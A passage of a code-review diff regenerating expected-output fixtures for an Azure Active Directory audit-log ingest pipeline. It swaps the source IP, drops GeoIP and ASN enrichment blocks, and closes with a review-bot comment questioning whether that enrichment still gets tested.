SO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124961200Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\
"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": 
\\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -4662,25 +4248,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4694,7 +4262,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -4808,7 +4376,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -4820,12 +4388,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036214600Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124967100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\
"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": 
\\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -4851,25 +4419,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4883,7 +4433,7 @@ "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -5006,7 +4556,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
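Review bot: In hunk `@@ -4851,25 +4419,7 @@` the regenerated expectation for `source` drops the whole `geo` and `as` objects and keeps only `"ip": "67.43.156.15"`, so this fixture no longer asserts that the pipeline's GeoIP/ASN enrichment runs at all. That is fine if the bundled test GeoIP database genuinely has no city or ASN record for this address, but the same shape would also result from an enrichment processor silently failing or being skipped, and the hunk alone cannot distinguish the two. It would be worth confirming against the other supported test addresses (the 1password fixture in this same PR uses `89.160.20.156`) whether one of them does resolve in the test database, so at least one document here still exercises the `source.geo` / `source.as` fields that the old expectation covered. The same observation applies to hunks `@@ -5049,25 +4599,7 @@` and `@@ -5260,25 +4792,7 @@`.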
